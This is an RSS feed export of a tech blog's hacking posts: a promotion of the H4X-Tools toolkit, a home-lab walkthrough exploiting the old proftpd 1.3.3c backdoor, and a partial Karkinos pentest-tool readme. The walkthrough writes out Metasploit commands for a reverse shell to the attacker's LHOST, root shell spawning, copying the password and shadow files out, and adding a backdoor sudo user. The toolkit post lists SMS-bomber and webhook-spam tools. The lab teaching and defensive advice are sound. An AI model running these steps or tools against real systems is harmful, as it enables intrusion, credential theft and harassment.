<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacks Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/category/hacks/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/category/hacks/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Wed, 21 Feb 2024 23:53:50 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>Hacks Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/category/hacks/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>H4X-Tools &#8211; Designed for Scraping, OSINT and Beyond</title>
		<link>http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/</link>
					<comments>http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 23:53:50 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[scraping]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2184</guid>

					<description><![CDATA[<p>Discover the power of H4X-Tools, a versatile toolkit designed for scraping, OSINT (Open-Source Intelligence), and beyond. From extracting information from social media accounts to conducting phone and IP lookups, H4X-Tools offers a wide array of functionalities to aid researchers, developers, and security enthusiasts alike. Explore its features, installation process, and community-driven development in this article. [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/">H4X-Tools &#8211; Designed for Scraping, OSINT and Beyond</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Discover the power of H4X-Tools, a versatile toolkit designed for scraping, OSINT (Open-Source Intelligence), and beyond.</p>
<p>From extracting information from social media accounts to conducting phone and IP lookups, H4X-Tools offers a wide array of functionalities to aid researchers, developers, and security enthusiasts alike.</p>
<p>Explore its features, installation process, and community-driven development in this article. Toolkit for scraping, OSINT and more.</p>
<p>Submit feature requests and bugs in the <a href="https://github.com/V1li/H4X-Tools/issues" target="_blank" rel="noreferrer noopener nofollow">issues</a> tab.</p>
<p>If you want to help with the development, follow the instructions in <a href="https://github.com/vil/H4X-Tools/blob/master/CONTRIBUTING.md" target="_blank" rel="noreferrer noopener nofollow">contributing</a> and simply open a pull request. You can also <a href="https://vili.dev/#donate" target="_blank" rel="noreferrer noopener nofollow">donate</a> to keep the project alive and me motivated!</p>
<h2 class="wp-block-heading"><strong>Current Tools</strong></h2>
<h3 class="wp-block-heading"><strong>Warning</strong></h3>
<p>Some tools might not work on Windows systems.</p>
<figure class="wp-block-table">
<table>
<thead>
<tr>
<th>Tool Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ig Scrape</td>
<td>Scrapes information from IG accounts.</td>
</tr>
<tr>
<td>Web Search</td>
<td>Searches the internet for the given query.</td>
</tr>
<tr>
<td>Phone Lookup</td>
<td>Looks up a phone number and returns information about it.</td>
</tr>
<tr>
<td>Ip Lookup</td>
<td>Looks up an IP/domain address and returns information about it.</td>
</tr>
<tr>
<td>Port Scanner</td>
<td>Scans for open ports in a given IP/domain address.</td>
</tr>
<tr>
<td>Username Search</td>
<td>Tries to find a given username from many different websites.</td>
</tr>
<tr>
<td>Email Search</td>
<td>Efficiently finds registered accounts from a given email. Thanks to <a href="https://github.com/megadose/holehe" target="_blank" rel="noreferrer noopener nofollow">holehe.</a></td>
</tr>
<tr>
<td>Webhook Spammer</td>
<td>Spams messages to a discord webhook.</td>
</tr>
<tr>
<td>WhoIs Lookup</td>
<td>Looks up a domain and returns information about it.</td>
</tr>
<tr>
<td>SMS Bomber</td>
<td>Spams messages to a given mobile number.</td>
</tr>
<tr>
<td>Fake Info Generator</td>
<td>Generates fake information using <a href="https://pypi.org/project/Faker/" target="_blank" rel="noreferrer noopener nofollow">Faker</a>.</td>
</tr>
<tr>
<td>Web Scrape</td>
<td>Scrapes links from a given url.</td>
</tr>
<tr>
<td>Wi-Fi Finder</td>
<td>Scans for nearby Wi-Fi networks.</td>
</tr>
<tr>
<td>Wi-Fi Password Getter</td>
<td>Scans for locally saved Wi-Fi passwords.</td>
</tr>
<tr>
<td>Dir Buster</td>
<td>Bruteforce directories on a website.</td>
</tr>
<tr>
<td>Local Accounts Getter</td>
<td>Scans for all local accounts and their information.</td>
</tr>
<tr>
<td>Caesar Cipher</td>
<td>Encrypts/decrypts/bruteforce a message using the Caesar cipher.</td>
</tr>
<tr>
<td>BaseXX</td>
<td>Encodes/decodes a message using Base64/32/16.</td>
</tr>
<tr>
<td>About</td>
<td>Tells you about the tool.</td>
</tr>
<tr>
<td>Donate</td>
<td>My crypto addresses where to donate.</td>
</tr>
<tr>
<td>Exit</td>
<td>Exits the tool.</td>
</tr>
</tbody>
</table>
</figure>
<h2 class="wp-block-heading"><strong>Note</strong></h2>
<p>-IG Scrape requires you to log in, in order to use it.</p>
<p>-SMS Bomber only works with US numbers.</p>
<p>-You might get rate limited after using some of the tools for too long.</p>
<h2 class="wp-block-heading"><strong>Installation</strong></h2>
<p>I’ll upload already built executables to the <a href="https://github.com/vil/H4X-Tools/releases" target="_blank" rel="noreferrer noopener nofollow">releases</a> tab, but I’d recommend installing the tool manually by following the instructions below. This way you also get the freshest version.</p>
<h2 class="wp-block-heading"><strong>Setup</strong></h2>
<p>Important</p>
<p>Make sure you have <a href="https://www.python.org/downloads/" target="_blank" rel="noreferrer noopener nofollow">Python</a> and <a href="https://git-scm.com/downloads" target="_blank" rel="noreferrer noopener nofollow">Git</a> installed.</p>
<p>View the <a href="https://github.com/vil/H4X-Tools/wiki" target="_blank" rel="noreferrer noopener nofollow">wiki page</a> for more detailed tutorial.</p>
<h2 class="wp-block-heading"><strong>Linux</strong></h2>
<ol>
<li>Clone the repo <code>git clone https://github.com/vil/h4x-tools.git</code></li>
<li>Change directory <code>cd h4x-tools</code></li>
<li>Run <code>sh setup.sh</code> in terminal to install the tool.</li>
</ol>
<h2 class="wp-block-heading"><strong>Windows</strong></h2>
<ol>
<li>Clone the repo <code>git clone https://github.com/vil/h4x-tools.git</code></li>
<li>Change directory <code>cd h4x-tools</code></li>
<li>Run the <code>setup.bat</code> file.</li>
</ol>
<p>Setup files will automatically build the tool as an executable. You can also run the tool using <code>python h4xtools.py</code> in the terminal.</p>
<p>Also, dependencies can be installed manually using <code>pip install -r requirements.txt</code>.</p>
<p>The post <a href="http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/">H4X-Tools &#8211; Designed for Scraping, OSINT and Beyond</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Exploiting the proftpd Linux Server</title>
		<link>http://kostacipo.stream/exploiting-the-proftpd-linux-server/</link>
					<comments>http://kostacipo.stream/exploiting-the-proftpd-linux-server/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 24 Jul 2023 22:21:29 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2155</guid>

					<description><![CDATA[<p>Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen. Don’t get too excited. This Behind the Scenes [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/exploiting-the-proftpd-linux-server/">Exploiting the proftpd Linux Server</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Computer systems get attacked daily. Ransomware, malware, stolen credentials, video game makers’ source code gets leaked, and money drained from users’ accounts dominate our news feeds. But how do hackers gain initial access to compromise a system? Let’s take a look at how a breach could happen.</p>
<p>Don’t get too excited. This Behind the Scenes (BTS) walkthrough is using an old, patched, well-documented vulnerability that was fixed shortly after it was discovered, but it serves as a great example showing how Linux servers are exploited if you don’t keep them patched and up-to-date.</p>
<p>We’ll go through the steps threat actors use to infiltrate a system:</p>
<ul>
<li>Reconnaissance</li>
<li>Scanning</li>
<li>Obtaining Access</li>
<li>Exfilitrating data</li>
<li>Maintaining Persistence</li>
<li>Pivoting</li>
</ul>
<h2 id="h-lab-environment">Lab Environment</h2>
<p>The local home lab provides everything we need for this walkthrough.</p>
<ul>
<li>Vulnerable Linux Machine &#8211; Ubuntu 16.04
<ul>
<li>proftpd 1.3.3c</li>
<li>Apache HTTP</li>
<li>OpenSSH</li>
</ul>
</li>
<li>Attacking Machine &#8211; Ubuntu Server 22.04
<ul>
<li>Nmap</li>
<li>Metasploit</li>
</ul>
</li>
</ul>
<p>These tools are widely used by penetration testers, network administrators, and threat actors alike. The first tool is Nmap, short for Network Mapper. For network admins, Nmap helps to find networked computers, discover open ports, available services, and detect known vulnerabilities on their network. Once a list of services is discovered, they can be exploited.</p>
<h2 id="h-scanning-with-nmap">Scanning with Nmap</h2>
<p>This is part of the reconnaissance or scanning phase where the threat actor wants to learn as much about the target system as they can. Because this is a demonstration we are not going to be quiet about our attack and will do nothing to conceal our intentions. We will use <strong>-sV</strong> option that tells us the current version of any services that are running. This is a noisy attack that should be picked up by most intrusion detection systems or SIEMs.</p>
<p><code>$ nmap -sV 10.10.10.172</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='242.6896551724138'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>The results from this command reveal a lot about our target system. Each open port is vulnerable to a potential attack. In our simulated attack, we are going to concentrate on the ftp service running the <strong>proftpd 1.3.3c</strong> software on Port 21.</p>
<table>
<tbody>
<tr>
<th>Port</th>
<th>Protocol</th>
<th>State</th>
<th>Service</th>
<th>Version</th>
</tr>
<tr>
<td><strong>21</strong></td>
<td><strong>tcp</strong></td>
<td><strong>open</strong></td>
<td><strong>ftp</strong></td>
<td><strong>proftpd 1.3.3c</strong></td>
</tr>
<tr>
<td>22</td>
<td>tcp</td>
<td>open</td>
<td>ssh</td>
<td>OpenSSH 7.2p2</td>
</tr>
<tr>
<td>80</td>
<td>tcp</td>
<td>open</td>
<td>http</td>
<td>Apache 2.4.18</td>
</tr>
</tbody>
</table>
<p>The <strong>proftpd 1.3.3c</strong> software was patched over 10 years ago but serves as a good example of how a vulnerable piece of software can be exploited. It is highly unlikely to still be running as an unpatched service.</p>
<h2 id="h-researching-vulnerabilities">Researching Vulnerabilities</h2>
<p>We could use Google to learn more about the vulnerabilities in the <strong>proftpd 1.3.3c</strong> server, or we can use the next tool in our toolbox, Metasploit, and use its built-in database to find known vulnerabilities.</p>
<p>Metasploit is an open-source penetration testing framework that helps network administrators, and security professionals discover vulnerabilities in their systems before exploitation by hackers. Complete with various tools, libraries, user interfaces, and modules, Metasploit allows a user to research, configure a payload, point it at a target, and launch an attack. Metasploit’s extensive database contains hundreds of exploits and payloads. Unfortunately, Metasploit is also widely used by threat actors.</p>
<h2 id="h-launching-metasploit">Launching Metasploit</h2>
<p>Find installation <a href="https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html?ref=hackernoon.com" target="_blank" rel="noopener noreferrer ugc">instructions for Metasploit in the documentation</a> and start the Metasploit framework as root with the following command.</p>
<p><code>$ sudo msfconsole</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='456.23336745138175'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<h2 id="h-search-the-database-for-known-exploits">Search the Database for Known Exploits</h2>
<p>Metasploit comes with an extensive database and technical details of over 180,000 vulnerabilites and 4000 exploits. These are all searchable with the <strong>search</strong> command from the Metasploit command line. We are going to use this database to find <strong>proftpd 1.3.3c</strong> vulnerabilities and known exploits.</p>
<p><code>msf6&gt; search proftpd 1.3.3c</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='171.63141993957703'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>The results of the search command reveal that there is a backdoor command execution exploit. This is what we are going to use to gain access to the Linux server.</p>
<h2 id="h-gaining-system-access">Gaining System Access</h2>
<p>Let’s begin initial access to the server by configuring our attack by typing <em><strong>use exploit/unix/ftp/proftpd_133c_backdoor</strong></em> <em>or simply the module ID number, <strong>use 0.</strong></em></p>
<p><code>msf6 &gt; use exploit/unix/ftp/proftpd_133c_backdoor</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='59.20550847457628'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>Use the <strong>show payloads</strong> command to display the payloads available for the proftpd_133c_backdoor module.</p>
<p><code>msf6 exploit(unix/ftp/proftpd_133c_backdoor) &gt; show payloads</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='293.33668341708545'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>From the available payloads for the proftpd_133c_backdoor exploit, we are interested in <strong>Option 5</strong>, the <strong>payload/cmd/unix/reverse_perl command</strong>. Set the option using the payload number or the full command as follows:</p>
<p><code>msf6 exploit(unix/ftp/proftpd_133c_backdoor) &gt; set PAYLOAD cmd/unix/reverse_perl</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='60.29962546816479'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>Now we need to make some site-specific configuration settings. The first is the IP address of the target machine. Set the remote host IP address with the RHOSTS command. This is the same IP address we used during our Nmap scan earlier and the machine that is running the proftpd_1.3.3c server.</p>
<p><code>msf6 exploit(unix/ftp/proftpd_133c_backdoor) &gt; set RHOSTS 10.10.10.172</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='47.614035087719294'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>The local IP address is the computer that we are using for this attack. In our case, the LHOST is 10.10.10.171.</p>
<p><code>msf6 exploit(unix/ftp/proftpd_133c_backdoor) &gt; set LHOST 10.10.10.171</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='752' height='55.97074468085106'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>The Metasploit configuration is complete. Run the exploit with the <strong>exploit</strong> command.</p>
<p><code>msf6 exploit(unix/ftp/proftpd_133c_backdoor) &gt; exploit</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='98.14973262032085'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>This exploit takes a few seconds to run. When you see ‘Command shell session 1 opened’ you can issue Linux commands by typing a command name. In our example, entering the <strong>whoami</strong> command displays the current user, which is root. This is a big deal! Root is the superuser account in UNIX, has administrative purposes, and typically has the highest access rights on the system.</p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='100.03174603174602'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>At this point, the system is compromised and you can do whatever you want.</p>
<h2 id="h-gaining-a-shell">Gaining a Shell</h2>
<p>To have any real fun on our compromised system we are going to want a full Linux shell. The following python command spawns a bash shell.</p>
<pre class="language-bash" tabindex="0"><code class="language-bash">python3 <span class="token parameter variable">-c</span> <span class="token string">'import pty; pty.spawn("/bin/bash")'</span>
</code></pre>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='745' height='40.75167785234899'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>Once we have a proper shell we can move through the system as root, having full access to the Linux environment. This is where the system is most vulnerable. As root we can install rootkits, malware, ransomware, and exfiltrate data.</p>
<h2 id="h-data-exfiltration">Data Exfiltration</h2>
<p>Data exfiltration is when a threat actor performs the unauthorized copying, transfer, or retrieval of data from a computer or server. As root, we have full access to the computer and can do anything we want including data exfiltration.</p>
<p>The Linux <strong>/etc/password</strong> file contains a list of system users, combined with the <strong>/etc/shadow</strong> file which contains encrypted passwords. Together these two files can be hacked to reveal username/password combinations for lateral movement through the network.</p>
<p>Again, we don’t really care about protecting our identity or our intentions (a SIEM would flag this immediately) so we are going to use <strong>scp</strong> (secure copy) to copy the password and shadow files to our remote server.</p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='800' height='89.36989498249709'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>And <strong>/etc/shadow</strong></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='778' height='99.33161953727506'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>We exfiltrated <strong>/etc/passwd</strong> and <strong>/etc/shadow</strong> to our local machine. There is no reason that we could not also exfiltrate databases, customer information, stored credit cards, or company-sensitive information out of the network to a remote location as we did with the password files.</p>
<h2 id="h-usernames-and-passwords">Usernames and Passwords</h2>
<p>Cracking the hashed passwords is beyond the scope of this walkthrough, but if you can crack the passwords, an attacker can use the same credentials to pivot to other machines across the network. <strong>John the Ripper</strong> and <strong>Hashcat</strong> are two well-known password cracking tools that can quickly reveal username/password combinations.</p>
<h2 id="h-maintaining-persistence">Maintaining Persistence</h2>
<p>Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials.  As root user, we can perform any administrative task we want, including adding users. One of the ways to maintain persistence is by adding a new user so the threat actor can gain access at a later time. Let’s add a new user.</p>
<p><code>root@vtsec:/# adduser badguy</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='738' height='54.22764227642276'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>And give them superuser access.</p>
<p><code>root@vtsec:/# usermod -aG sudo badguy</code></p>
<div class="sc-a6c0bd8c-1 ijZWBT image-container undefined"></div>
<div><img decoding="async" src="data:;base64,<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='740' height='61.54054054054054'/>&#8221; alt=&#8221;&#8221; aria-hidden=&#8221;true&#8221; /></div>
<p>In the Sophos Active Adversary Playbook for 2021, “The median time that attackers were able to remain in the target network before detection – dwell time – was 11 days. This provides attackers with approximately 264 hours for malicious activity, such as lateral movement, reconnaissance, credential dumping, data exfiltration, and more.” Becoming a user of the system is one of the ways they can maintain persistence during this dwell time.</p>
<h2 id="h-how-to-protect-your-network">How to Protect Your Network</h2>
<p>This type of attack would be caught by Antivirus (AV), Data Loss Prevention (DLP), and other SIEM solutions to control intrusions and data exfiltration. These are all basic cyber security tools that are part of a company’s overall security strategy that focuses on detecting and preventing the loss, leakage, or misuse of data through breaches, exfiltration, and unauthorized use.</p>
<p>Although it’s unlikely to find the <strong>proftpd 1.3.3c</strong> vulnerability because it was patched a long time ago, protecting your servers from this type of attack is the first step to protecting them. Update your software and perform routine patch management for all of your services.</p>
<p>The post <a href="http://kostacipo.stream/exploiting-the-proftpd-linux-server/">Exploiting the proftpd Linux Server</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/exploiting-the-proftpd-linux-server/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Karkinos &#8211; Penetration Testing and Hacking CTF&#8217;s Swiss Army Knife</title>
		<link>http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/</link>
					<comments>http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 23 Jan 2023 19:31:24 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Penetration Testing Framework]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2145</guid>

					<description><![CDATA[<p>What is Karkinos? Karkinos is a light-weight &#8216;Swiss Army Knife&#8217; for penetration testing and/or hacking CTF&#8217;s. Currently, Karkinos offers the following: Encoding/Decoding characters Encrypting/Decrypting text or files 3 Modules Cracking and generating hashes Disclaimer This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/karkinos-penetration-testing-and-hacking-ctfs-swiss-army-knife/">Karkinos &#8211; Penetration Testing and Hacking CTF&#8217;s Swiss Army Knife</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2><strong>What is Karkinos?</strong></h2>
<p dir="auto">Karkinos is a light-weight &#8216;Swiss Army Knife&#8217; for penetration testing and/or hacking CTF&#8217;s. Currently, Karkinos offers the following:</p>
<ul dir="auto">
<li>Encoding/Decoding characters</li>
<li>Encrypting/Decrypting text or files</li>
<li>3 Modules</li>
<li>Cracking and generating hashes</li>
</ul>
<h2><strong>Disclaimer</strong></h2>
<p>This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be solely the users’ responsibility.</p>
<p>More: <a href="https://github.com/helich0pper/Karkinos" target="_blank" rel="noopener">https://github.com/helich0pper/Karkinos</a></p>
<h2><strong>Dependencies</strong></h2>
<ul>
<li>Any server capable of hosting PHP; tested with Apache Server</li>
<li>Tested with PHP 7.4.9</li>
<li>Tested with Python 3.8<br />
Make sure it is in your path as:<br />
Windows: <code>python</code><br />
Linux: <code>python3</code><br />
If it is not, please change the commands in <code>includes/pid.php</code></li>
<li>pip3</li>
<li>Raspberry Pi Zero friendly <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /> (crack hashes at your own risk)</li>
</ul>
<h2><a id="user-content-installing" class="anchor" href="https://github.com/helich0pper/Karkinos#installing" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Installing</strong></h2>
<p>This installation guide assumes you have all the dependencies. A Wiki page with troubleshooting steps can be found <a href="https://helich0pper.github.io/karkinos/" target="_blank" rel="nofollow noopener">here</a>.</p>
<h3><a id="user-content-linuxbsd" class="anchor" href="https://github.com/helich0pper/Karkinos#linuxbsd" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Linux/BSD</strong></h3>
<ol dir="auto">
<li><code>git clone https://github.com/helich0pper/Karkinos.git</code></li>
<li><code>cd Karkinos</code></li>
<li><code>pip3 install -r requirements.txt</code></li>
<li><code>cd wordlists &amp;&amp; unzip passlist.zip</code> You can also unzip it manually using file explorer. Just make sure passlist.txt is in <strong>wordlists</strong> directory.</li>
<li><code>Make sure you have write privileges for db/main.db</code></li>
<li>Enable <code>extension=mysqli</code> in your php.ini file.<br />
If you don&#8217;t know where to find this, refer to the PHP <a href="https://www.php.net/manual/en/configuration.file.php#:~:text=d%20php%20PHP%20will%20load,ini%20as%20configuration%20files." target="_blank" rel="nofollow noopener">docs</a>. Note: MySQLi is only used to store statistics.</li>
<li>Thats it! Now just host it using your preferred web server or run: <code>php -S 127.0.0.1:8888</code> in the Karkinos directory.<strong>Important: using port 5555, 5556, or 5557 will conflict with the Modules</strong><br />
If you insist on using these ports, change the <code>PORT</code> value in:</li>
</ol>
<ul>
<li>
<ul dir="auto">
<li><code>/bin/Server/app.py Line 87</code></li>
<li><code>/bin/Busting/app.py Line 155</code></li>
<li><code>/bin/PortScan/app.py Line 128</code></li>
</ul>
</li>
</ul>
<h2 dir="auto"><strong>Windows</strong></h2>
<ol dir="auto">
<li><code>git clone https://github.com/helich0pper/Karkinos.git</code></li>
<li><code>cd Karkinos</code></li>
<li><code>pip3 install -r requirements.txt</code></li>
<li><code>cd wordlists &amp;&amp; unzip passlist.zip</code><br />
You can also unzip it manually using file explorer. Just make sure passlist.txt is in <strong>wordlists</strong> directory.</li>
<li><code>Make sure you have write privileges for db/main.db</code></li>
<li>Enable <code>extension=mysqli.dll</code> in your php.ini file.<br />
If you don&#8217;t know where to find this, refer to the PHP <a href="https://www.php.net/manual/en/configuration.file.php#:~:text=d%20php%20PHP%20will%20load,ini%20as%20configuration%20files." target="_blank" rel="nofollow noopener">docs</a>. Note: MySQLi is only used to store statistics</li>
<li>Thats it! Now just host it using your preferred web server or run: <code>php -S 127.0.0.1:8888</code> in the Karkinos directory.<strong>Important: using port 5555, 5556, or 5557 will conflict with the Modules</strong><br />
If you insist on using these ports, change the <code>PORT</code> value in:</li>
</ol>
<ul dir="auto">
<li><code>/bin/Server/app.py Line 87</code></li>
<li><code>/bin/Busting/app.py Line 155</code></li>
<li><code>/bin/PortScan/app.py Line 128</code></li>
</ul>
<h3><a id="user-content-home-menu" class="anchor" href="https://github.com/helich0pper/Karkinos#home-menu" target="_blank" rel="noopener" aria-hidden="true"></a><strong>Home Menu</strong></h3>
<p>Landing page and quick access menu.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/home-4.png"><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-232590" src="https://hakin9.org/wp-content/uploads/2020/12/home-4.png" sizes="(max-width: 1327px) 100vw, 1327px" srcset="https://hakin9.org/wp-content/uploads/2020/12/home-4.png 1327w, https://hakin9.org/wp-content/uploads/2020/12/home-4-378x251.png 378w, https://hakin9.org/wp-content/uploads/2020/12/home-4-565x376.png 565w, https://hakin9.org/wp-content/uploads/2020/12/home-4-460x306.png 460w, https://hakin9.org/wp-content/uploads/2020/12/home-4-1024x681.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/home-4-768x510.png 768w, https://hakin9.org/wp-content/uploads/2020/12/home-4-500x332.png 500w, https://hakin9.org/wp-content/uploads/2020/12/home-4-200x133.png 200w, https://hakin9.org/wp-content/uploads/2020/12/home-4-120x80.png 120w, https://hakin9.org/wp-content/uploads/2020/12/home-4-310x206.png 310w" alt="" width="1327" height="882" /></a></p>
<p>User stats are displayed here. Currently, the stats recorded are only the total hashes and hash types cracked successfully.</p>
<p><a href="https://hakin9.org/wp-content/uploads/2020/12/home2-3.png"><img decoding="async" class="alignnone size-full wp-image-232591" src="https://hakin9.org/wp-content/uploads/2020/12/home2-3.png" sizes="(max-width: 1103px) 100vw, 1103px" srcset="https://hakin9.org/wp-content/uploads/2020/12/home2-3.png 1103w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-378x309.png 378w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-565x463.png 565w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-460x377.png 460w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-1024x838.png 1024w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-768x629.png 768w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-500x409.png 500w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-200x164.png 200w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-120x98.png 120w, https://hakin9.org/wp-content/uploads/2020/12/home2-3-310x254.png 310w" alt="" width="1103" height="903" /></a></p>
<h3><strong>Encoding/Decoding</strong></h3>
<p>This page allows you to encode/decode in common formats (more may be added soon)</p>
